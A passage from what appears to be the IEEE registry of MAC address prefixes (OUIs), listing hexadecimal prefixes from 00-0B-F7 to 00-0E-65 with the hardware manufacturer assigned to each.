Ltd 00-0B-F7 (hex) NIDEK CO.,LTD 00-0B-F8 (hex) Infinera 00-0B-F9 (hex) Gemstone communications, Inc. 00-0B-FA (hex) EXEMYS SRL 00-0B-FB (hex) D-NET International Corporation 00-0B-FC (hex) Cisco Systems 00-0B-FD (hex) Cisco Systems 00-0B-FE (hex) CASTEL Broadband Limited 00-0B-FF (hex) Berkeley Camera Engineering 00-0C-00 (hex) BEB Industrie-Elektronik AG 00-0C-01 (hex) Abatron AG 00-0C-02 (hex) ABB Oy 00-0C-03 (hex) HDMI Licensing, LLC 00-0C-04 (hex) Tecnova 00-0C-05 (hex) RPA Reserch Co., Ltd. 00-0C-06 (hex) Nixvue Systems Pte Ltd 00-0C-07 (hex) Iftest AG 00-0C-08 (hex) HUMEX Technologies Corp. 00-0C-09 (hex) Hitachi IE Systems Co., Ltd 00-0C-0A (hex) Guangdong Province Electronic Technology Research Institute 00-0C-0B (hex) Broadbus Technologies 00-0C-0C (hex) APPRO TECHNOLOGY INC. 00-0C-0D (hex) Communications & Power Industries / Satcom Division 00-0C-0E (hex) XtremeSpectrum, Inc. 00-0C-0F (hex) Techno-One Co., Ltd 00-0C-10 (hex) PNI Corporation 00-0C-11 (hex) NIPPON DEMPA CO.,LTD. 00-0C-12 (hex) Micro-Optronic-Messtechnik GmbH 00-0C-13 (hex) MediaQ 00-0C-14 (hex) Diagnostic Instruments, Inc. 00-0C-15 (hex) CyberPower Systems, Inc. 00-0C-16 (hex) Concorde Microsystems Inc. 00-0C-17 (hex) AJA Video Systems Inc 00-0C-18 (hex) Zenisu Keisoku Inc. 00-0C-19 (hex) Telio Communications GmbH 00-0C-1A (hex) Quest Technical Solutions Inc. 00-0C-1B (hex) ORACOM Co, Ltd. 00-0C-1C (hex) MicroWeb Co., Ltd. 00-0C-1D (hex) Mettler & Fuchs AG 00-0C-1E (hex) Global Cache 00-0C-1F (hex) Glimmerglass Networks 00-0C-20 (hex) Fi WIn, Inc. 00-0C-21 (hex) Faculty of Science and Technology, Keio University 00-0C-22 (hex) Double D Electronics Ltd 00-0C-23 (hex) Beijing Lanchuan Tech. Co., Ltd. 00-0C-24 (hex) ANATOR 00-0C-25 (hex) Allied Telesis Labs, Inc. 00-0C-26 (hex) Weintek Labs. Inc. 00-0C-27 (hex) Sammy Corporation 00-0C-28 (hex) RIFATRON 00-0C-29 (hex) VMware, Inc. 00-0C-2A (hex) OCTTEL Communication Co., Ltd. 00-0C-2B (hex) ELIAS Technology, Inc. 00-0C-2C (hex) Enwiser Inc. 00-0C-2D (hex) FullWave Technology Co., Ltd. 00-0C-2E (hex) Openet information technology(shenzhen) Co., Ltd. 00-0C-2F (hex) SeorimTechnology Co.,Ltd. 00-0C-30 (hex) Cisco 00-0C-31 (hex) Cisco 00-0C-32 (hex) Avionic Design Development GmbH 00-0C-33 (hex) Compucase Enterprise Co. Ltd. 00-0C-34 (hex) Vixen Co., Ltd. 00-0C-35 (hex) KaVo Dental GmbH & Co. KG 00-0C-36 (hex) SHARP TAKAYA ELECTRONICS INDUSTRY CO.,LTD. 00-0C-37 (hex) Geomation, Inc. 00-0C-38 (hex) TelcoBridges Inc. 00-0C-39 (hex) Sentinel Wireless Inc. 00-0C-3A (hex) Oxance 00-0C-3B (hex) Orion Electric Co., Ltd. 00-0C-3C (hex) MediaChorus, Inc. 00-0C-3D (hex) Glsystech Co., Ltd. 00-0C-3E (hex) Crest Audio 00-0C-3F (hex) Cogent Defence & Security Networks, 00-0C-40 (hex) Altech Controls 00-0C-41 (hex) Cisco-Linksys 00-0C-42 (hex) Routerboard.com 00-0C-43 (hex) Ralink Technology, Corp. 00-0C-44 (hex) Automated Interfaces, Inc. 00-0C-45 (hex) Animation Technologies Inc. 00-0C-46 (hex) Allied Telesyn Inc. 00-0C-47 (hex) SK Teletech(R&D Planning Team) 00-0C-48 (hex) QoStek Corporation 00-0C-49 (hex) Dangaard Telecom RTC Division A/S 00-0C-4A (hex) Cygnus Microsystems (P) Limited 00-0C-4B (hex) Cheops Elektronik 00-0C-4C (hex) Arcor AG&Co. 00-0C-4D (hex) ACRA CONTROL 00-0C-4E (hex) Winbest Technology CO,LT 00-0C-4F (hex) UDTech Japan Corporation 00-0C-50 (hex) Seagate Technology 00-0C-51 (hex) Scientific Technologies Inc. 00-0C-52 (hex) Roll Systems Inc. 00-0C-53 (hex) PRIVATE 00-0C-54 (hex) Pedestal Networks, Inc 00-0C-55 (hex) Microlink Communications Inc. 00-0C-56 (hex) Megatel Computer (1986) Corp. 00-0C-57 (hex) MACKIE Engineering Services Belgium BVBA 00-0C-58 (hex) M&S Systems 00-0C-59 (hex) Indyme Electronics, Inc. 00-0C-5A (hex) IBSmm Industrieelektronik Multimedia 00-0C-5B (hex) HANWANG TECHNOLOGY CO.,LTD 00-0C-5C (hex) GTN Systems B.V. 00-0C-5D (hex) CHIC TECHNOLOGY (CHINA) CORP. 00-0C-5E (hex) Calypso Medical 00-0C-5F (hex) Avtec, Inc. 00-0C-60 (hex) ACM Systems 00-0C-61 (hex) AC Tech corporation DBA Advanced Digital 00-0C-62 (hex) ABB AB, Cewe-Control 00-0C-63 (hex) Zenith Electronics Corporation 00-0C-64 (hex) X2 MSA Group 00-0C-65 (hex) Sunin Telecom 00-0C-66 (hex) Pronto Networks Inc 00-0C-67 (hex) OYO ELECTRIC CO.,LTD 00-0C-68 (hex) SigmaTel, Inc. 00-0C-69 (hex) National Radio Astronomy Observatory 00-0C-6A (hex) MBARI 00-0C-6B (hex) Kurz Industrie-Elektronik GmbH 00-0C-6C (hex) Elgato Systems LLC 00-0C-6D (hex) Edwards Ltd. 00-0C-6E (hex) ASUSTEK COMPUTER INC. 00-0C-6F (hex) Amtek system co.,LTD. 00-0C-70 (hex) ACC GmbH 00-0C-71 (hex) Wybron, Inc 00-0C-72 (hex) Tempearl Industrial Co., Ltd. 00-0C-73 (hex) TELSON ELECTRONICS CO., LTD 00-0C-74 (hex) RIVERTEC CORPORATION 00-0C-75 (hex) Oriental integrated electronics. LTD 00-0C-76 (hex) MICRO-STAR INTERNATIONAL CO., LTD. 00-0C-77 (hex) Life Racing Ltd 00-0C-78 (hex) In-Tech Electronics Limited 00-0C-79 (hex) Extel Communications P/L 00-0C-7A (hex) DaTARIUS Technologies GmbH 00-0C-7B (hex) ALPHA PROJECT Co.,Ltd. 00-0C-7C (hex) Internet Information Image Inc. 00-0C-7D (hex) TEIKOKU ELECTRIC MFG. CO., LTD 00-0C-7E (hex) Tellium Incorporated 00-0C-7F (hex) synertronixx GmbH 00-0C-80 (hex) Opelcomm Inc. 00-0C-81 (hex) Schneider Electric (Australia) 00-0C-82 (hex) NETWORK TECHNOLOGIES INC 00-0C-83 (hex) Logical Solutions 00-0C-84 (hex) Eazix, Inc. 00-0C-85 (hex) Cisco Systems 00-0C-86 (hex) Cisco Systems 00-0C-87 (hex) AMD 00-0C-88 (hex) Apache Micro Peripherals, Inc. 00-0C-89 (hex) AC Electric Vehicles, Ltd. 00-0C-8A (hex) Bose Corporation 00-0C-8B (hex) Connect Tech Inc 00-0C-8C (hex) KODICOM CO.,LTD. 00-0C-8D (hex) MATRIX VISION GmbH 00-0C-8E (hex) Mentor Engineering Inc 00-0C-8F (hex) Nergal s.r.l. 00-0C-90 (hex) Octasic Inc. 00-0C-91 (hex) Riverhead Networks Inc. 00-0C-92 (hex) WolfVision Gmbh 00-0C-93 (hex) Xeline Co., Ltd. 00-0C-94 (hex) United Electronic Industries, Inc. (EUI) 00-0C-95 (hex) PrimeNet 00-0C-96 (hex) OQO, Inc. 00-0C-97 (hex) NV ADB TTV Technologies SA 00-0C-98 (hex) LETEK Communications Inc. 00-0C-99 (hex) HITEL LINK Co.,Ltd 00-0C-9A (hex) Hitech Electronics Corp. 00-0C-9B (hex) EE Solutions, Inc 00-0C-9C (hex) Chongho information & communications 00-0C-9D (hex) AirWalk Communications, Inc. 00-0C-9E (hex) MemoryLink Corp. 00-0C-9F (hex) NKE Corporation 00-0C-A0 (hex) StorCase Technology, Inc. 00-0C-A1 (hex) SIGMACOM Co., LTD. 00-0C-A2 (hex) Scopus Network Technologies Ltd 00-0C-A3 (hex) Rancho Technology, Inc. 00-0C-A4 (hex) Prompttec Product Management GmbH 00-0C-A5 (hex) Naman NZ LTd 00-0C-A6 (hex) Mintera Corporation 00-0C-A7 (hex) Metro (Suzhou) Technologies Co., Ltd. 00-0C-A8 (hex) Garuda Networks Corporation 00-0C-A9 (hex) Ebtron Inc. 00-0C-AA (hex) Cubic Transportation Systems Inc 00-0C-AB (hex) COMMEND International 00-0C-AC (hex) Citizen Watch Co., Ltd. 00-0C-AD (hex) BTU International 00-0C-AE (hex) Ailocom Oy 00-0C-AF (hex) TRI TERM CO.,LTD. 00-0C-B0 (hex) Star Semiconductor Corporation 00-0C-B1 (hex) Salland Engineering (Europe) BV 00-0C-B2 (hex) Comstar Co., Ltd. 00-0C-B3 (hex) ROUND Co.,Ltd. 00-0C-B4 (hex) AutoCell Laboratories, Inc. 00-0C-B5 (hex) Premier Technolgies, Inc 00-0C-B6 (hex) NANJING SEU MOBILE & INTERNET TECHNOLOGY CO.,LTD 00-0C-B7 (hex) Nanjing Huazhuo Electronics Co., Ltd. 00-0C-B8 (hex) MEDION AG 00-0C-B9 (hex) LEA 00-0C-BA (hex) Jamex, Inc. 00-0C-BB (hex) ISKRAEMECO 00-0C-BC (hex) Iscutum 00-0C-BD (hex) Interface Masters, Inc 00-0C-BE (hex) Innominate Security Technologies AG 00-0C-BF (hex) Holy Stone Ent. Co., Ltd. 00-0C-C0 (hex) Genera Oy 00-0C-C1 (hex) Cooper Industries Inc. 00-0C-C2 (hex) ControlNet (India) Private Limited 00-0C-C3 (hex) BeWAN systems 00-0C-C4 (hex) Tiptel AG 00-0C-C5 (hex) Nextlink Co., Ltd. 00-0C-C6 (hex) Ka-Ro electronics GmbH 00-0C-C7 (hex) Intelligent Computer Solutions Inc. 00-0C-C8 (hex) Xytronix Research & Design, Inc. 00-0C-C9 (hex) ILWOO DATA & TECHNOLOGY CO.,LTD 00-0C-CA (hex) Hitachi Global Storage Technologies 00-0C-CB (hex) Design Combus Ltd 00-0C-CC (hex) Aeroscout Ltd. 00-0C-CD (hex) IEC - TC57 00-0C-CE (hex) Cisco Systems 00-0C-CF (hex) Cisco Systems 00-0C-D0 (hex) Symetrix 00-0C-D1 (hex) SFOM Technology Corp. 00-0C-D2 (hex) Schaffner EMV AG 00-0C-D3 (hex) Prettl Elektronik Radeberg GmbH 00-0C-D4 (hex) Positron Public Safety Systems inc. 00-0C-D5 (hex) Passave Inc. 00-0C-D6 (hex) PARTNER TECH 00-0C-D7 (hex) Nallatech Ltd 00-0C-D8 (hex) M. K. Juchheim GmbH & Co 00-0C-D9 (hex) Itcare Co., Ltd 00-0C-DA (hex) FreeHand Systems, Inc. 00-0C-DB (hex) Brocade Communications Systems, Inc 00-0C-DC (hex) BECS Technology, Inc 00-0C-DD (hex) AOS Technologies AG 00-0C-DE (hex) ABB STOTZ-KONTAKT GmbH 00-0C-DF (hex) PULNiX America, Inc 00-0C-E0 (hex) Trek Diagnostics Inc. 00-0C-E1 (hex) The Open Group 00-0C-E2 (hex) Rolls-Royce 00-0C-E3 (hex) Option International N.V. 00-0C-E4 (hex) NeuroCom International, Inc. 00-0C-E5 (hex) Motorola Mobility, Inc. 00-0C-E6 (hex) Meru Networks Inc 00-0C-E7 (hex) MediaTek Inc. 00-0C-E8 (hex) GuangZhou AnJuBao Co., Ltd 00-0C-E9 (hex) BLOOMBERG L.P. 00-0C-EA (hex) aphona Kommunikationssysteme 00-0C-EB (hex) CNMP Networks, Inc. 00-0C-EC (hex) Spectracom Corp. 00-0C-ED (hex) Real Digital Media 00-0C-EE (hex) jp-embedded 00-0C-EF (hex) Open Networks Engineering Ltd 00-0C-F0 (hex) M & N GmbH 00-0C-F1 (hex) Intel Corporation 00-0C-F2 (hex) GAMESA EÓLICA 00-0C-F3 (hex) CALL IMAGE SA 00-0C-F4 (hex) AKATSUKI ELECTRIC MFG.CO.,LTD. 00-0C-F5 (hex) InfoExpress 00-0C-F6 (hex) Sitecom Europe BV 00-0C-F7 (hex) Nortel Networks 00-0C-F8 (hex) Nortel Networks 00-0C-F9 (hex) ITT Flygt AB 00-0C-FA (hex) Digital Systems Corp 00-0C-FB (hex) Korea Network Systems 00-0C-FC (hex) S2io Technologies Corp 00-0C-FD (hex) Hyundai ImageQuest Co.,Ltd. 00-0C-FE (hex) Grand Electronic Co., Ltd 00-0C-FF (hex) MRO-TEK LIMITED 00-0D-00 (hex) Seaway Networks Inc. 00-0D-01 (hex) P&E Microcomputer Systems, Inc. 00-0D-02 (hex) NEC AccessTechnica, Ltd. 00-0D-03 (hex) Matrics, Inc. 00-0D-04 (hex) Foxboro Eckardt Development GmbH 00-0D-05 (hex) cybernet manufacturing inc. 00-0D-06 (hex) Compulogic Limited 00-0D-07 (hex) Calrec Audio Ltd 00-0D-08 (hex) AboveCable, Inc. 00-0D-09 (hex) Yuehua(Zhuhai) Electronic CO. LTD 00-0D-0A (hex) Projectiondesign as 00-0D-0B (hex) Buffalo Inc. 00-0D-0C (hex) MDI Security Systems 00-0D-0D (hex) ITSupported, LLC 00-0D-0E (hex) Inqnet Systems, Inc. 00-0D-0F (hex) Finlux Ltd 00-0D-10 (hex) Embedtronics Oy 00-0D-11 (hex) DENTSPLY - Gendex 00-0D-12 (hex) AXELL Corporation 00-0D-13 (hex) Wilhelm Rutenbeck GmbH&Co. 00-0D-14 (hex) Vtech Innovation LP dba Advanced American Telephones 00-0D-15 (hex) Voipac s.r.o. 00-0D-16 (hex) UHS Systems Pty Ltd 00-0D-17 (hex) Turbo Networks Co.Ltd 00-0D-18 (hex) Mega-Trend Electronics CO., LTD. 00-0D-19 (hex) ROBE Show lighting 00-0D-1A (hex) Mustek System Inc. 00-0D-1B (hex) Kyoto Electronics Manufacturing Co., Ltd. 00-0D-1C (hex) Amesys Defense 00-0D-1D (hex) HIGH-TEK HARNESS ENT. CO., LTD. 00-0D-1E (hex) Control Techniques 00-0D-1F (hex) AV Digital 00-0D-20 (hex) ASAHIKASEI TECHNOSYSTEM CO.,LTD. 00-0D-21 (hex) WISCORE Inc. 00-0D-22 (hex) Unitronics LTD 00-0D-23 (hex) Smart Solution, Inc 00-0D-24 (hex) SENTEC E&E CO., LTD. 00-0D-25 (hex) SANDEN CORPORATION 00-0D-26 (hex) Primagraphics Limited 00-0D-27 (hex) MICROPLEX Printware AG 00-0D-28 (hex) Cisco 00-0D-29 (hex) Cisco 00-0D-2A (hex) Scanmatic AS 00-0D-2B (hex) Racal Instruments 00-0D-2C (hex) Patapsco Designs Ltd 00-0D-2D (hex) NCT Deutschland GmbH 00-0D-2E (hex) Matsushita Avionics Systems Corporation 00-0D-2F (hex) AIN Comm.Tech.Co., LTD 00-0D-30 (hex) IceFyre Semiconductor 00-0D-31 (hex) Compellent Technologies, Inc. 00-0D-32 (hex) DispenseSource, Inc. 00-0D-33 (hex) Prediwave Corp. 00-0D-34 (hex) Shell International Exploration and Production, Inc. 00-0D-35 (hex) PAC International Ltd 00-0D-36 (hex) Wu Han Routon Electronic Co., Ltd 00-0D-37 (hex) WIPLUG 00-0D-38 (hex) NISSIN INC. 00-0D-39 (hex) Network Electronics 00-0D-3A (hex) Microsoft Corp. 00-0D-3B (hex) Microelectronics Technology Inc. 00-0D-3C (hex) i.Tech Dynamic Ltd 00-0D-3D (hex) Hammerhead Systems, Inc. 00-0D-3E (hex) APLUX Communications Ltd. 00-0D-3F (hex) VTI Instruments Corporation 00-0D-40 (hex) Verint Loronix Video Solutions 00-0D-41 (hex) Siemens AG ICM MP UC RD IT KLF1 00-0D-42 (hex) Newbest Development Limited 00-0D-43 (hex) DRS Tactical Systems Inc. 00-0D-44 (hex) Audio BU - Logitech 00-0D-45 (hex) Tottori SANYO Electric Co., Ltd. 00-0D-46 (hex) Parker SSD Drives 00-0D-47 (hex) Collex 00-0D-48 (hex) AEWIN Technologies Co., Ltd. 00-0D-49 (hex) Triton Systems of Delaware, Inc. 00-0D-4A (hex) Steag ETA-Optik 00-0D-4B (hex) Roku, LLC 00-0D-4C (hex) Outline Electronics Ltd. 00-0D-4D (hex) Ninelanes 00-0D-4E (hex) NDR Co.,LTD. 00-0D-4F (hex) Kenwood Corporation 00-0D-50 (hex) Galazar Networks 00-0D-51 (hex) DIVR Systems, Inc. 00-0D-52 (hex) Comart system 00-0D-53 (hex) Beijing 5w Communication Corp. 00-0D-54 (hex) 3Com Ltd 00-0D-55 (hex) SANYCOM Technology Co.,Ltd 00-0D-56 (hex) Dell PCBA Test 00-0D-57 (hex) Fujitsu I-Network Systems Limited. 00-0D-58 (hex) PRIVATE 00-0D-59 (hex) Amity Systems, Inc. 00-0D-5A (hex) Tiesse SpA 00-0D-5B (hex) Smart Empire Investments Limited 00-0D-5C (hex) Robert Bosch GmbH, VT-ATMO 00-0D-5D (hex) Raritan Computer, Inc 00-0D-5E (hex) NEC Personal Products 00-0D-5F (hex) Minds Inc 00-0D-60 (hex) IBM Corp 00-0D-61 (hex) Giga-Byte Technology Co., Ltd. 00-0D-62 (hex) Funkwerk Dabendorf GmbH 00-0D-63 (hex) DENT Instruments, Inc. 00-0D-64 (hex) COMAG Handels AG 00-0D-65 (hex) Cisco Systems 00-0D-66 (hex) Cisco Systems 00-0D-67 (hex) BelAir Networks Inc. 00-0D-68 (hex) Vinci Systems, Inc. 00-0D-69 (hex) TMT&D Corporation 00-0D-6A (hex) Redwood Technologies LTD 00-0D-6B (hex) Mita-Teknik A/S 00-0D-6C (hex) M-Audio 00-0D-6D (hex) K-Tech Devices Corp. 00-0D-6E (hex) K-Patents Oy 00-0D-6F (hex) Ember Corporation 00-0D-70 (hex) Datamax Corporation 00-0D-71 (hex) boca systems 00-0D-72 (hex) 2Wire, Inc 00-0D-73 (hex) Technical Support, Inc. 00-0D-74 (hex) Sand Network Systems, Inc. 00-0D-75 (hex) Kobian Pte Ltd - Taiwan Branch 00-0D-76 (hex) Hokuto Denshi Co,. Ltd. 00-0D-77 (hex) FalconStor Software 00-0D-78 (hex) Engineering & Security 00-0D-79 (hex) Dynamic Solutions Co,.Ltd. 00-0D-7A (hex) DiGATTO Asia Pacific Pte Ltd 00-0D-7B (hex) Consensys Computers Inc. 00-0D-7C (hex) Codian Ltd 00-0D-7D (hex) Afco Systems 00-0D-7E (hex) Axiowave Networks, Inc. 00-0D-7F (hex) MIDAS COMMUNICATION TECHNOLOGIES PTE LTD ( Foreign Branch) 00-0D-80 (hex) Online Development Inc 00-0D-81 (hex) Pepperl+Fuchs GmbH 00-0D-82 (hex) PHS srl 00-0D-83 (hex) Sanmina-SCI Hungary Ltd. 00-0D-84 (hex) Makus Inc. 00-0D-85 (hex) Tapwave, Inc. 00-0D-86 (hex) Huber + Suhner AG 00-0D-87 (hex) Elitegroup Computer System Co. (ECS) 00-0D-88 (hex) D-Link Corporation 00-0D-89 (hex) Bils Technology Inc 00-0D-8A (hex) Winners Electronics Co., Ltd. 00-0D-8B (hex) T&D Corporation 00-0D-8C (hex) Shanghai Wedone Digital Ltd. CO. 00-0D-8D (hex) ProLinx Communication Gateways, Inc. 00-0D-8E (hex) Koden Electronics Co., Ltd. 00-0D-8F (hex) King Tsushin Kogyo Co., LTD. 00-0D-90 (hex) Factum Electronics AB 00-0D-91 (hex) Eclipse (HQ Espana) S.L. 00-0D-92 (hex) Arima Communication Corporation 00-0D-93 (hex) Apple Computer 00-0D-94 (hex) AFAR Communications,Inc 00-0D-95 (hex) Opti-cell, Inc. 00-0D-96 (hex) Vtera Technology Inc. 00-0D-97 (hex) Tropos Networks, Inc. 00-0D-98 (hex) S.W.A.C. Schmitt-Walter Automation Consult GmbH 00-0D-99 (hex) Orbital Sciences Corp.; Launch Systems Group 00-0D-9A (hex) INFOTEC LTD Ashby-de-la-Zouch Leicestershire LE65 2PS 00-0D-9B (hex) Heraeus Electro-Nite International N.V. 00-0D-9C (hex) Elan GmbH & Co KG 00-0D-9D (hex) Hewlett-Packard Company 00-0D-9E (hex) TOKUDEN OHIZUMI SEISAKUSYO Co.,Ltd. 00-0D-9F (hex) RF Micro Devices 00-0D-A0 (hex) NEDAP N.V. 00-0D-A1 (hex) MIRAE ITS Co.,LTD. 00-0D-A2 (hex) Infrant Technologies, Inc. 00-0D-A3 (hex) Emerging Technologies Limited 00-0D-A4 (hex) DOSCH & AMAND SYSTEMS AG 00-0D-A5 (hex) Fabric7 Systems, Inc 00-0D-A6 (hex) Universal Switching Corporation 00-0D-A7 (hex) PRIVATE 00-0D-A8 (hex) Teletronics Technology Corporation 00-0D-A9 (hex) T.E.A.M. S.L. 00-0D-AA (hex) S.A.Tehnology co.,Ltd. 00-0D-AB (hex) Parker Hannifin GmbH Electromechanical Division Europe 00-0D-AC (hex) Japan CBM Corporation 00-0D-AD (hex) Dataprobe Inc 00-0D-AE (hex) SAMSUNG HEAVY INDUSTRIES CO., LTD. 00-0D-AF (hex) Plexus Corp (UK) Ltd 00-0D-B0 (hex) Olym-tech Co.,Ltd. 00-0D-B1 (hex) Japan Network Service Co., Ltd. 00-0D-B2 (hex) Ammasso, Inc. 00-0D-B3 (hex) SDO Communication Corperation 00-0D-B4 (hex) NETASQ 00-0D-B5 (hex) GLOBALSAT TECHNOLOGY CORPORATION 00-0D-B6 (hex) Broadcom Corporation 00-0D-B7 (hex) SANKO ELECTRIC CO,.LTD 00-0D-B8 (hex) SCHILLER AG 00-0D-B9 (hex) PC Engines GmbH 00-0D-BA (hex) Océ Document Technologies GmbH 00-0D-BB (hex) Nippon Dentsu Co.,Ltd. 00-0D-BC (hex) Cisco Systems 00-0D-BD (hex) Cisco Systems 00-0D-BE (hex) Bel Fuse Europe Ltd.,UK 00-0D-BF (hex) TekTone Sound & Signal Mfg., Inc. 00-0D-C0 (hex) Spagat AS 00-0D-C1 (hex) SafeWeb Inc 00-0D-C2 (hex) PRIVATE 00-0D-C3 (hex) First Communication, Inc. 00-0D-C4 (hex) Emcore Corporation 00-0D-C5 (hex) EchoStar Global B.V. 00-0D-C6 (hex) DigiRose Technology Co., Ltd. 00-0D-C7 (hex) COSMIC ENGINEERING INC. 00-0D-C8 (hex) AirMagnet, Inc 00-0D-C9 (hex) THALES Elektronik Systeme GmbH 00-0D-CA (hex) Tait Electronics 00-0D-CB (hex) Petcomkorea Co., Ltd. 00-0D-CC (hex) NEOSMART Corp. 00-0D-CD (hex) GROUPE TXCOM LE PLESSIS ROBINSON HAUTS-DE-SEINE 92350 00-0D-CE (hex) Dynavac Technology Pte Ltd 00-0D-CF (hex) Cidra Corp. 00-0D-D0 (hex) TetraTec Instruments GmbH 00-0D-D1 (hex) Stryker Corporation 00-0D-D2 (hex) Simrad Optronics ASA 00-0D-D3 (hex) SAMWOO Telecommunication Co.,Ltd. 00-0D-D4 (hex) Symantec Corporation 00-0D-D5 (hex) O'RITE TECHNOLOGY CO.,LTD 00-0D-D6 (hex) ITI LTD 00-0D-D7 (hex) Bright 00-0D-D8 (hex) BBN 00-0D-D9 (hex) Anton Paar GmbH 00-0D-DA (hex) ALLIED TELESIS K.K. 00-0D-DB (hex) AIRWAVE TECHNOLOGIES INC. 00-0D-DC (hex) VAC 00-0D-DD (hex) PROFÃÂLO TELRA ELEKTRONÃÂK SANAYàVE TÃÂCARET A.Þ. 00-0D-DE (hex) Joyteck Co., Ltd. 00-0D-DF (hex) Japan Image & Network Inc. 00-0D-E0 (hex) ICPDAS Co.,LTD 00-0D-E1 (hex) Control Products, Inc. 00-0D-E2 (hex) CMZ Sistemi Elettronici 00-0D-E3 (hex) AT Sweden AB 00-0D-E4 (hex) DIGINICS, Inc. 00-0D-E5 (hex) Samsung Thales 00-0D-E6 (hex) YOUNGBO ENGINEERING CO.,LTD 00-0D-E7 (hex) Snap-on OEM Group 00-0D-E8 (hex) Nasaco Electronics Pte. Ltd 00-0D-E9 (hex) Napatech Aps 00-0D-EA (hex) Kingtel Telecommunication Corp. 00-0D-EB (hex) CompXs Limited 00-0D-EC (hex) Cisco Systems 00-0D-ED (hex) Cisco Systems 00-0D-EE (hex) Andrew RF Power Amplifier Group 00-0D-EF (hex) Soc. Coop. Bilanciai 00-0D-F0 (hex) QCOM TECHNOLOGY INC. 00-0D-F1 (hex) IONIX INC. 00-0D-F2 (hex) PRIVATE 00-0D-F3 (hex) Asmax Solutions 00-0D-F4 (hex) Watertek Co. 00-0D-F5 (hex) Teletronics International Inc. 00-0D-F6 (hex) Technology Thesaurus Corp. 00-0D-F7 (hex) Space Dynamics Lab 00-0D-F8 (hex) ORGA Kartensysteme GmbH 00-0D-F9 (hex) NDS Limited 00-0D-FA (hex) Micro Control Systems Ltd. 00-0D-FB (hex) Komax AG 00-0D-FC (hex) ITFOR Inc. 00-0D-FD (hex) Huges Hi-Tech Inc., 00-0D-FE (hex) Hauppauge Computer Works, Inc. 00-0D-FF (hex) CHENMING MOLD INDUSTRY CORP. 00-0E-00 (hex) Atrie 00-0E-01 (hex) ASIP Technologies Inc. 00-0E-02 (hex) Advantech AMT Inc. 00-0E-03 (hex) Emulex 00-0E-04 (hex) CMA/Microdialysis AB 00-0E-05 (hex) WIRELESS MATRIX CORP. 00-0E-06 (hex) Team Simoco Ltd 00-0E-07 (hex) Sony Ericsson Mobile Communications AB 00-0E-08 (hex) Cisco Linksys LLC 00-0E-09 (hex) Shenzhen Coship Software Co.,LTD. 00-0E-0A (hex) SAKUMA DESIGN OFFICE 00-0E-0B (hex) Netac Technology Co., Ltd. 00-0E-0C (hex) Intel Corporation 00-0E-0D (hex) HESCH Schröder GmbH 00-0E-0E (hex) ESA elettronica S.P.A. 00-0E-0F (hex) ERMME Vert-Le-Petit 91710 00-0E-10 (hex) C-guys, Inc. 00-0E-11 (hex) BDT Büro- und Datentechnik GmbH & Co. KG 00-0E-12 (hex) Adaptive Micro Systems Inc. 00-0E-13 (hex) Accu-Sort Systems inc. 00-0E-14 (hex) Visionary Solutions, Inc. 00-0E-15 (hex) Tadlys LTD 00-0E-16 (hex) SouthWing S.L. 00-0E-17 (hex) PRIVATE 00-0E-18 (hex) MyA Technology 00-0E-19 (hex) LogicaCMG Pty Ltd 00-0E-1A (hex) JPS Communications 00-0E-1B (hex) IAV GmbH 00-0E-1C (hex) Hach Company 00-0E-1D (hex) ARION Technology Inc. 00-0E-1E (hex) QLogic Corporation 00-0E-1F (hex) TCL Networks Equipment Co., Ltd. 00-0E-20 (hex) ACCESS Systems Americas, Inc. 00-0E-21 (hex) MTU Friedrichshafen GmbH 00-0E-22 (hex) PRIVATE 00-0E-23 (hex) Incipient, Inc. 00-0E-24 (hex) Huwell Technology Inc. 00-0E-25 (hex) Hannae Technology Co., Ltd 00-0E-26 (hex) Gincom Technology Corp. 00-0E-27 (hex) Crere Networks, Inc. 00-0E-28 (hex) Dynamic Ratings P/L 00-0E-29 (hex) Shester Communications Inc 00-0E-2A (hex) PRIVATE 00-0E-2B (hex) Safari Technologies 00-0E-2C (hex) Netcodec co. 00-0E-2D (hex) Hyundai Digital Technology Co.,Ltd. 00-0E-2E (hex) Edimax Technology Co., Ltd. 00-0E-2F (hex) Disetronic Medical Systems AG 00-0E-30 (hex) AERAS Networks, Inc. 00-0E-31 (hex) Olympus Soft Imaging Solutions GmbH 00-0E-32 (hex) Kontron Medical 00-0E-33 (hex) Shuko Electronics Co.,Ltd 00-0E-34 (hex) NexGen City, LP 00-0E-35 (hex) Intel Corp 00-0E-36 (hex) HEINESYS, Inc. 00-0E-37 (hex) Harms & Wende GmbH & Co.KG 00-0E-38 (hex) Cisco Systems 00-0E-39 (hex) Cisco Systems 00-0E-3A (hex) Cirrus Logic 00-0E-3B (hex) Hawking Technologies, Inc. 00-0E-3C (hex) Transact Technologies Inc 00-0E-3D (hex) Televic N.V. 00-0E-3E (hex) Sun Optronics Inc 00-0E-3F (hex) Soronti, Inc. 00-0E-40 (hex) Nortel Networks 00-0E-41 (hex) NIHON MECHATRONICS CO.,LTD. 00-0E-42 (hex) Motic Incoporation Ltd. 00-0E-43 (hex) G-Tek Electronics Sdn. Bhd. 00-0E-44 (hex) Digital 5, Inc. 00-0E-45 (hex) Beijing Newtry Electronic Technology Ltd 00-0E-46 (hex) Niigata Seimitsu Co.,Ltd. 00-0E-47 (hex) NCI System Co.,Ltd. 00-0E-48 (hex) Lipman TransAction Solutions 00-0E-49 (hex) Forsway Scandinavia AB 00-0E-4A (hex) Changchun Huayu WEBPAD Co.,LTD 00-0E-4B (hex) atrium c and i 00-0E-4C (hex) Bermai Inc. 00-0E-4D (hex) Numesa Inc. 00-0E-4E (hex) Waveplus Technology Co., Ltd. 00-0E-4F (hex) Trajet GmbH 00-0E-50 (hex) Thomson Telecom Belgium 00-0E-51 (hex) tecna elettronica srl 00-0E-52 (hex) Optium Corporation 00-0E-53 (hex) AV TECH CORPORATION 00-0E-54 (hex) AlphaCell Wireless Ltd. 00-0E-55 (hex) AUVITRAN 00-0E-56 (hex) 4G Systems GmbH & Co. KG 00-0E-57 (hex) Iworld Networking, Inc. 00-0E-58 (hex) Sonos, Inc. 00-0E-59 (hex) SAGEM SA 00-0E-5A (hex) TELEFIELD inc. 00-0E-5B (hex) ParkerVision - Direct2Data 00-0E-5C (hex) Motorola Mobility, Inc. 00-0E-5D (hex) Triple Play Technologies A/S 00-0E-5E (hex) Raisecom Technology 00-0E-5F (hex) activ-net GmbH & Co. KG 00-0E-60 (hex) 360SUN Digital Broadband Corporation 00-0E-61 (hex) MICROTROL LIMITED 00-0E-62 (hex) Nortel Networks 00-0E-63 (hex) Lemke Diagnostics GmbH 00-0E-64 (hex) Elphel, Inc 00-0E-65 (hex) TransCore 00-0E-66 (hex) 